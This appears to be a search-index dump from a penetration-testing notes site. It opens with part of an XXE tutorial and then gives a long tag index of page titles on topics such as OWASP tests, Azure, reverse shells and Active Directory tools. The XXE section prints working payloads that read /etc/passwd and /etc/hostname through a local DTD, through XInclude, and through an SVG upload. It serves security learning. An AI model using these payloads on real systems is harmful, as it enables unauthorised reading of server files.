                        For example, suppose there is a DTD file on the server filesystem at the location /usr/local/app/schema.dtd, and this DTD file defines an entity called custom_entity. An attacker can trigger an XML parsing error message containing the contents of the /etc/passwd file by submitting a hybrid DTD like the following:

                        <!DOCTYPE foo [ \n<!ENTITY % local_dtd SYSTEM \"file:///usr/local/app/schema.dtd\"> \n<!ENTITY % custom_entity ' \n<!ENTITY &#x25; file SYSTEM \"file:///etc/passwd\"> <!ENTITY &#x25; eval \"<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>\"> &#x25;eval; &#x25;error; '> \n%local_dtd; \n]>\n
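
                        On many GNOME-based Linux targets, /usr/share/yelp/dtd/docbookx.dtd exists and defines an entity named ISOamso, which makes it a commonly repurposed local DTD (whether the file is present on a given target is an assumption to verify):

                        <!DOCTYPE foo [\n<!ENTITY % local_dtd SYSTEM \"file:///usr/share/yelp/dtd/docbookx.dtd\">\n<!ENTITY % ISOamso '\n<!ENTITY &#x25; file SYSTEM \"file:///etc/passwd\">\n<!ENTITY &#x25; eval \"<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>\">\n&#x25;eval;\n&#x25;error;\n'>\n%local_dtd;\n]>\n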
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#7-xinclude-attack","title":"7. XInclude attack","text":"

                        In the following scenario, we cannot implement a classic, blind, or OOB XXE attack because we don't control the entire XML document, and so we cannot define the DOCTYPE element.

                        We can bypass this restriction with XInclude. XInclude is part of the XML specification that allows an XML document to be built from sub-documents. An XInclude attack can be placed within any data value, so it works even when we only control a single item of data that is placed into a server-side XML document.

                        For instance:

                        <d0p xmlns:xi=\"http://www.w3.org/2001/XInclude\">\n<xi:include parse=\"text\" href=\"file:///etc/passwd\"/></d0p>\n

                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#8-xxe-via-file-upload","title":"8. XXE via file upload","text":"

                        In a file upload feature, if the application expects an image format like .png or .jpeg, the image-processing library is likely to accept .svg too. Since SVG is an XML-based format, we can embed an XXE payload in it.

                        Our XXE payload could be:

                        <?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;</text></svg>\n
                        ","tags":["xxe"]},{"location":"webexploitation/xml-external-entity-xee/#interesting-files","title":"Interesting files","text":"

                        • Interesting Windows files
                        • Interesting Linux files

                        ","tags":["xxe"]},{"location":"tags/","title":"tags","text":"

                        Following is a list of relevant tags:

                        ","tags":["tags"]},{"location":"tags/#389","title":"389","text":"
                        • Port 389 - 636 LDAP
                        ","tags":["tags"]},{"location":"tags/#azure","title":"Azure","text":"
                        • Pentesting Amazon Web Services (AWS)
                        • Pentesting Azure
                        ","tags":["tags"]},{"location":"tags/#cms","title":"CMS","text":"
                        • Pentesting MyBB
                        • Pentesting WordPress
                        ","tags":["tags"]},{"location":"tags/#cpts","title":"CPTS","text":"
                        • CPTS index
                        • 01. Information Gathering / Footprinting
                        • Pentesting Notes
                        ","tags":["tags"]},{"location":"tags/#cve-2015-6967","title":"CVE-2015-6967","text":"
                        • Nibbles - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#dns-poisoning","title":"DNS poisoning","text":"
                        • DNS poisoning
                        ","tags":["tags"]},{"location":"tags/#dynamics","title":"Dynamics","text":"
                        • Pentesting OData
                        ","tags":["tags"]},{"location":"tags/#http","title":"HTTP","text":"
                        • CSRF attack - Cross Site Request Forgery
                        ","tags":["tags"]},{"location":"tags/#microsoft-365","title":"Microsoft 365","text":"
                        • M365 CLI
                        ","tags":["tags"]},{"location":"tags/#mybb","title":"MyBB","text":"
                        • Pentesting MyBB
                        ","tags":["tags"]},{"location":"tags/#nfc","title":"NFC","text":"
                        • Mifare Classic
                        • Mifare Desfire
                        • NFC - Setting up proxmark3 RDV4.01
                        • Proxmark3 RDV4.01
                        ","tags":["tags"]},{"location":"tags/#nfs","title":"NFS","text":"
                        • Port 111, 32731 - rpc
                        • Port 2049 - NFS Network File System
                        • Port 43 - whois
                        ","tags":["tags"]},{"location":"tags/#ntlm","title":"NTLM","text":"
                        • HTTP Authentication Schemes
                        ","tags":["tags"]},{"location":"tags/#ntlm-credential-stealing","title":"NTLM credential stealing","text":"
                        • Responder - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#network-file-system","title":"Network File System","text":"
                        • Port 111, 32731 - rpc
                        • Port 2049 - NFS Network File System
                        • Port 43 - whois
                        ","tags":["tags"]},{"location":"tags/#nosql","title":"NoSQL","text":"
                        • Mongo
                        ","tags":["tags"]},{"location":"tags/#oscp","title":"OSCP","text":"
                        • Password attacks
                        ","tags":["tags"]},{"location":"tags/#openflow","title":"Openflow","text":"
                        • 6653 Openflow
                        ","tags":["tags"]},{"location":"tags/#openstack","title":"Openstack","text":"
                        • Openstack Essentials
                        ","tags":["tags"]},{"location":"tags/#rfid","title":"RFID","text":"
                        • Mifare Classic
                        • Mifare Desfire
                        • RFID
                        ","tags":["tags"]},{"location":"tags/#rfid-pentesting","title":"RFID pentesting","text":"
                        • NFC - Setting up proxmark3 RDV4.01
                        ","tags":["tags"]},{"location":"tags/#smtp","title":"SMTP","text":"
                        • Ports 25, 565, 587 - Simple Mail Transfer Protocol (SMTP)
                        • postfix - An SMTP server
                        ","tags":["tags"]},{"location":"tags/#smtp-server","title":"SMTP server","text":"
                        • postfix - An SMTP server
                        ","tags":["tags"]},{"location":"tags/#snmp","title":"SNMP","text":"
                        • 161-162 SNMP Simple Network Management Protocol
                        ","tags":["tags"]},{"location":"tags/#sql","title":"SQL","text":"
                        • MariaDB
                        • MySQL
                        • sqlite
                        • Virtual environments
                        ","tags":["tags"]},{"location":"tags/#simple-mail-transfer-protocol","title":"Simple Mail Transfer Protocol","text":"
                        • Ports 25, 565, 587 - Simple Mail Transfer Protocol (SMTP)
                        ","tags":["tags"]},{"location":"tags/#wstg-apit-01","title":"WSTG-APIT-01","text":"
                        • Testing GraphQL - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-01","title":"WSTG-ATHN-01","text":"
                        • Testing for Credentials Transported over an Encrypted Channel - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-02","title":"WSTG-ATHN-02","text":"
                        • Testing for Default Credentials - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-03","title":"WSTG-ATHN-03","text":"
                        • Testing for Weak Lock Out Mechanism - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-04","title":"WSTG-ATHN-04","text":"
                        • Testing for Bypassing Authentication Schema - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-05","title":"WSTG-ATHN-05","text":"
                        • Testing for Vulnerable Remember Password - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-06","title":"WSTG-ATHN-06","text":"
                        • Testing for Browser Cache Weaknesses - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-07","title":"WSTG-ATHN-07","text":"
                        • Testing for Weak Password Policy - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-08","title":"WSTG-ATHN-08","text":"
                        • Testing for Weak Security Question Answer - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-09","title":"WSTG-ATHN-09","text":"
                        • Testing for Weak Password Change or Reset Functionalities - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-10","title":"WSTG-ATHN-10","text":"
                        • Testing for Weaker Authentication in Alternative Channel - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athn-11","title":"WSTG-ATHN-11","text":"
                        • Testing Multi-Factor Authentication (MFA) - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athz-01","title":"WSTG-ATHZ-01","text":"
                        • Testing Directory Traversal File Include - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athz-02","title":"WSTG-ATHZ-02","text":"
                        • Testing for Bypassing Authorization Schema - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athz-03","title":"WSTG-ATHZ-03","text":"
                        • Testing for Privilege Escalation - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athz-04","title":"WSTG-ATHZ-04","text":"
                        • Testing for Insecure Direct Object References - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-athz-05","title":"WSTG-ATHZ-05","text":"
                        • Testing for OAuth Weaknesses - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-01","title":"WSTG-BUSL-01","text":"
                        • Test Business Logic Data Validation - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-02","title":"WSTG-BUSL-02","text":"
                        • Test Ability to Forge Requests - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-03","title":"WSTG-BUSL-03","text":"
                        • Test Integrity Checks - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-04","title":"WSTG-BUSL-04","text":"
                        • Test for Process Timing - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-05","title":"WSTG-BUSL-05","text":"
                        • Test Number of Times a Function Can Be Used Limits - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-06","title":"WSTG-BUSL-06","text":"
                        • Testing for the Circumvention of Work Flows - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-07","title":"WSTG-BUSL-07","text":"
                        • Test Defenses Against Application Misuse - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-08","title":"WSTG-BUSL-08","text":"
                        • Test Upload of Unexpected File Types - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-09","title":"WSTG-BUSL-09","text":"
                        • Test Upload of Malicious Files - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-busl-10","title":"WSTG-BUSL-10","text":"
                        • Test Payment Functionality - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-01","title":"WSTG-CLNT-01","text":"
                        • Testing for DOM-Based Cross Site Scripting - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-02","title":"WSTG-CLNT-02","text":"
                        • Testing for JavaScript Execution - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-03","title":"WSTG-CLNT-03","text":"
                        • Testing for HTML Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-04","title":"WSTG-CLNT-04","text":"
                        • Testing for Client-side URL Redirect - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-05","title":"WSTG-CLNT-05","text":"
                        • Testing for CSS Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-06","title":"WSTG-CLNT-06","text":"
                        • Testing for Client-side Resource Manipulation - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-07","title":"WSTG-CLNT-07","text":"
                        • Testing Cross Origin Resource Sharing - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-08","title":"WSTG-CLNT-08","text":"
                        • Testing for Cross Site Flashing - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-09","title":"WSTG-CLNT-09","text":"
                        • Testing for Clickjacking - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-10","title":"WSTG-CLNT-10","text":"
                        • Testing WebSockets - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-11","title":"WSTG-CLNT-11","text":"
                        • Testing Web Messaging - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-12","title":"WSTG-CLNT-12","text":"
                        • Testing Browser Storage - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-13","title":"WSTG-CLNT-13","text":"
                        • Testing for Cross Site Script Inclusion - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-clnt-14","title":"WSTG-CLNT-14","text":"
                        • Testing for Reverse Tabnabbing - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-01","title":"WSTG-CONF-01","text":"
                        • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-02","title":"WSTG-CONF-02","text":"
                        • Test Application Platform Configuration - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-03","title":"WSTG-CONF-03","text":"
                        • Test File Extensions Handling for Sensitive Information - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-04","title":"WSTG-CONF-04","text":"
                        • Review Old Backup and Unreferenced Files for Sensitive Information - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-05","title":"WSTG-CONF-05","text":"
                        • Enumerate Infrastructure and Application Admin Interfaces - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-06","title":"WSTG-CONF-06","text":"
                        • Test HTTP Methods - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-07","title":"WSTG-CONF-07","text":"
                        • Test HTTP Strict Transport Security - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-08","title":"WSTG-CONF-08","text":"
                        • Test RIA Cross Domain Policy - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-09","title":"WSTG-CONF-09","text":"
                        • Test File Permission - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-10","title":"WSTG-CONF-10","text":"
                        • Test for Subdomain Takeover - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-11","title":"WSTG-CONF-11","text":"
                        • Test Cloud Storage - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-12","title":"WSTG-CONF-12","text":"
                        • Testing for Content Security Policy - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-conf-13","title":"WSTG-CONF-13","text":"
                        • Test Path Confusion - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-cryp-01","title":"WSTG-CRYP-01","text":"
                        • Testing for Weak Transport Layer Security - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-cryp-02","title":"WSTG-CRYP-02","text":"
                        • Testing for Padding Oracle - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-cryp-03","title":"WSTG-CRYP-03","text":"
                        • Testing for Sensitive Information Sent via Unencrypted Channels - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-cryp-04","title":"WSTG-CRYP-04","text":"
                        • Testing for Weak Encryption - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-errh-01","title":"WSTG-ERRH-01","text":"
                        • Testing for Improper Error Handling - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-errh-02","title":"WSTG-ERRH-02","text":"
                        • Testing for Stack Traces - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-idnt-01","title":"WSTG-IDNT-01","text":"
                        • Test Role Definitions - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-idnt-02","title":"WSTG-IDNT-02","text":"
                        • Test User Registration Process - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-idnt-03","title":"WSTG-IDNT-03","text":"
                        • Test Account Provisioning Process - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-idnt-04","title":"WSTG-IDNT-04","text":"
                        • Testing for Account Enumeration and Guessable User Account - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-idnt-05","title":"WSTG-IDNT-05","text":"
                        • Testing for Weak or Unenforced Username Policy - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-01","title":"WSTG-INFO-01","text":"
                        • Conduct search engine discovery reconnaissance for information leakage - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-02","title":"WSTG-INFO-02","text":"
                        • nikto
                        • Fingerprint Web Server - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-03","title":"WSTG-INFO-03","text":"
                        • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-04","title":"WSTG-INFO-04","text":"
                        • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-05","title":"WSTG-INFO-05","text":"
                        • Review Webpage content for Information Leakage - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-06","title":"WSTG-INFO-06","text":"
                        • Identify Application Entry Points - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-07","title":"WSTG-INFO-07","text":"
                        • Map Execution Paths through applications - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-08","title":"WSTG-INFO-08","text":"
                        • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-09","title":"WSTG-INFO-09","text":"
                        • Fingerprint Web Applications - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-info-10","title":"WSTG-INFO-10","text":"
                        • Map Application architecture - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-01","title":"WSTG-INPV-01","text":"
                        • Testing for Reflected Cross Site Scripting - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-02","title":"WSTG-INPV-02","text":"
                        • Testing for Stored Cross Site Scripting - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-03","title":"WSTG-INPV-03","text":"
                        • Testing for HTTP Verb Tampering - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-04","title":"WSTG-INPV-04","text":"
                        • Testing for HTTP Parameter Pollution - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-05","title":"WSTG-INPV-05","text":"
                        • Testing for SQL Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-06","title":"WSTG-INPV-06","text":"
                        • Testing for LDAP Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-07","title":"WSTG-INPV-07","text":"
                        • Testing for XML Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-08","title":"WSTG-INPV-08","text":"
                        • Testing for SSI Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-09","title":"WSTG-INPV-09","text":"
                        • Testing for XPath Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-10","title":"WSTG-INPV-10","text":"
                        • Testing for IMAP SMTP Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-11","title":"WSTG-INPV-11","text":"
                        • Testing for Code Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-12","title":"WSTG-INPV-12","text":"
                        • Testing for Command Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-13","title":"WSTG-INPV-13","text":"
                        • Testing for Format String Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-14","title":"WSTG-INPV-14","text":"
                        • Testing for Incubated Vulnerability - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-15","title":"WSTG-INPV-15","text":"
                        • Testing for HTTP Splitting Smuggling - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-16","title":"WSTG-INPV-16","text":"
                        • Testing for HTTP Incoming Requests - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-17","title":"WSTG-INPV-17","text":"
                        • Testing for Host Header Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-18","title":"WSTG-INPV-18","text":"
                        • Testing for Server-side Template Injection - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-19","title":"WSTG-INPV-19","text":"
                        • Testing for Server-Side Request Forgery - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-inpv-20","title":"WSTG-INPV-20","text":"
                        • Testing for Mass Assignment - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-01","title":"WSTG-SESS-01","text":"
                        • Testing for Session Management Schema - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-02","title":"WSTG-SESS-02","text":"
                        • Testing for Cookies Attributes - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-03","title":"WSTG-SESS-03","text":"
                        • Testing for Session Fixation - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-04","title":"WSTG-SESS-04","text":"
                        • Testing for Exposed Session Variables - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-05","title":"WSTG-SESS-05","text":"
                        • Testing for Cross Site Request Forgery - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-06","title":"WSTG-SESS-06","text":"
                        • Testing for Logout Functionality - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-07","title":"WSTG-SESS-07","text":"
                        • Testing Session Timeout - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-08","title":"WSTG-SESS-08","text":"
                        • Testing for Session Puzzling - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-09","title":"WSTG-SESS-09","text":"
                        • Testing for Session Hijacking - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#wstg-sess-10","title":"WSTG-SESS-10","text":"
                        • Testing JSON Web Tokens - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#active","title":"active","text":"
                        • Port 389 - 636 LDAP
                        ","tags":["tags"]},{"location":"tags/#active-directory","title":"active directory","text":"
                        • Active Directory - LDAP
                        • The ActiveDirectory PowerShell module
                        • BloodHound
                        • evil-winrm
                        • Microsoft Management Console (MMC)
                        • NT Authority System
                        • PowerUp.ps1
                        • Responder.py - An SMB server to listen for NTLM hashes
                        • SharpView
                        ","tags":["tags"]},{"location":"tags/#active-recon","title":"active recon","text":"
                        • nmap - A network exploration and security auditing tool
                        • Powercat - An alternative to netcat coded in PowerShell
                        ","tags":["tags"]},{"location":"tags/#aes","title":"aes","text":"
                        • TCP reverse shell with AES encryption
                        • TCP reverse shell with hybrid encryption AES + RSA
                        ","tags":["tags"]},{"location":"tags/#amazon","title":"amazon","text":"
                        • AWS cli
                        ","tags":["tags"]},{"location":"tags/#amazon-web-services","title":"amazon web services","text":"
                        • Amazon Web Services (AWS) Essentials
                        ","tags":["tags"]},{"location":"tags/#android","title":"android","text":"
                        • scrcpy
                        ","tags":["tags"]},{"location":"tags/#apache-cloudstack","title":"apache cloudstack","text":"
                        • Apache CloudStack Essentials
                        ","tags":["tags"]},{"location":"tags/#api","title":"api","text":"
                        • arjun
                        • Hacking APIs
                        • API authentication attacks
                        • API Reconnaissance
                        • Endpoint analysis
                        • Evasion and combining techniques
                        • Exploiting API Authorization
                        • Testing for improper assets management
                        • Injection attacks
                        • Mass assignment
                        • Setting up the labs + Writeups
                        • Scanning APIs
                        • SSRF attack - Server-side Request Forgery
                        • Setting up the environment
                        ","tags":["tags"]},{"location":"tags/#arp","title":"arp","text":"
                        • Arp poisoning
                        ","tags":["tags"]},{"location":"tags/#arp-poisoning","title":"arp poisoning","text":"
                        • Arp poisoning
                        ","tags":["tags"]},{"location":"tags/#assessment","title":"assessment","text":"
                        • Vulnerability assessment
                        ","tags":["tags"]},{"location":"tags/#attack","title":"attack","text":"
                        • Broken access control
                        • Buffer Overflow attack
                        • Captcha Replay attack
                        • Carriage Return and Linefeed - CRLF Attack
                        • XFS attack - Cross-frame Scripting
                        • CSRF attack - Cross Site Request Forgery
                        • XSS attack - Cross-Site Scripting
                        • Insecure deserialization
                        ","tags":["tags"]},{"location":"tags/#authentication","title":"authentication","text":"
                        • HTTP Authentication Schemes
                        ","tags":["tags"]},{"location":"tags/#aws","title":"aws","text":"
                        • AWS cli
                        • Amazon Web Services (AWS) Essentials
                        ","tags":["tags"]},{"location":"tags/#az-104","title":"az-104","text":"
                        • AZ-104 Microsoft Azure Administrator certificate
                        ","tags":["tags"]},{"location":"tags/#az-500","title":"az-500","text":"
                        • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                        • AZ-500 Microsoft Azure Active Directory- Platform protection
                        • AZ-500 Microsoft Azure Active Directory- Data and applications
                        • AZ-500 Microsoft Azure Active Directory- Security operations
                        • Exams - Practice the AZ-500
                        • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                        • AZ-500 Microsoft Azure Security Technologies Certificate
                        ","tags":["tags"]},{"location":"tags/#az-900","title":"az-900","text":"
                        • Exams - Practice the AZ-900
                        • AZ-900 Notes to get through the Azure Fundamentals Certificate
                        ","tags":["tags"]},{"location":"tags/#azure_1","title":"azure","text":"
                        • Azure-CLI
                        • Azure Powershell
                        • AZ-104 Microsoft Azure Administrator certificate
                        • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                        • AZ-500 Microsoft Azure Active Directory- Platform protection
                        • AZ-500 Microsoft Azure Active Directory- Data and applications
                        • AZ-500 Microsoft Azure Active Directory- Security operations
                        • Exams - Practice the AZ-500
                        • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                        • AZ-500 Microsoft Azure Security Technologies Certificate
                        • Exams - Practice the AZ-900
                        • AZ-900 Notes to get through the Azure Fundamentals Certificate
                        ","tags":["tags"]},{"location":"tags/#azure-cli","title":"azure-cli","text":"
                        • Azure-CLI
                        ","tags":["tags"]},{"location":"tags/#backdoors","title":"backdoors","text":"
                        • Evading detection in file transfers
                        • Transferring files with code
                        • Transferring files techniques - Linux
                        • Transferring files techniques - Windows
                        ","tags":["tags"]},{"location":"tags/#bash","title":"bash","text":"
                        • Packet manager
                        • Azure-CLI
                        • bash - Bourne Again Shell
                        • curl
                        • unshadow
                        • vnstat - Monitoring network impact
                        ","tags":["tags"]},{"location":"tags/#basic-digest","title":"basic digest","text":"
                        • HTTP Authentication Schemes
                        ","tags":["tags"]},{"location":"tags/#bcm","title":"bcm","text":"
                        • 623 - Intelligent Platform Management Interface (IPMI)
                        ","tags":["tags"]},{"location":"tags/#binaries","title":"binaries","text":"
                        • LOLbins - Living off the land binaries - LOLbas and GTFObins
                        ","tags":["tags"]},{"location":"tags/#bind-shells","title":"bind shells","text":"
                        • Bind Shells
                        ","tags":["tags"]},{"location":"tags/#binscope","title":"binscope","text":"
                        • Common vulnerabilities
                        ","tags":["tags"]},{"location":"tags/#browsers","title":"browsers","text":"
                        • Pentesting browsers
                        • Man in the browser attack
                        ","tags":["tags"]},{"location":"tags/#brute-force","title":"brute force","text":"
                        • John the Ripper - A hash cracker and dictionary attack tool
                        ","tags":["tags"]},{"location":"tags/#brute-forcing","title":"brute forcing","text":"
                        • hydra
                        • medusa
                        ","tags":["tags"]},{"location":"tags/#burpsuite","title":"burpsuite","text":"
                        • Burpsuite
                        • Interactsh - An alternative to BurpSuite Collaborator
                        • BurpSuite Labs - Broken access control vulnerabilities
                        • BurpSuite Labs - Insecure deserialization
                        • BurpSuite Labs - Json Web Token jwt
                        • BurpSuite Labs
                        • BurpSuite Labs - SQL injection
                        • BurpSuite Labs - Server Side Request Forgery
                        • BurpSuite Labs - Server Side Template Injection
                        • BurpSuite Labs - Cross-site Scripting
                        • BurpSuite Labs - Json Web Token jwt
                        • Traffic analysis - Thick client Applications
                        ","tags":["tags"]},{"location":"tags/#bypass-techniques","title":"bypass techniques","text":"
                        • Virtualbox and Extension Pack
                        ","tags":["tags"]},{"location":"tags/#bypassing-firewall","title":"bypassing firewall","text":"
                        • Bypassing Next Generation Firewalls
                        ","tags":["tags"]},{"location":"tags/#bypassing-techniques","title":"bypassing techniques","text":"
                        • Bypassing Next Generation Firewalls
                        • Hijack the Internet Explorer process to bypass a host-based firewall
                        ","tags":["tags"]},{"location":"tags/#certification","title":"certification","text":"
                        • eWPT Preparation
                        • AZ-104 Microsoft Azure Administrator certificate
                        • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
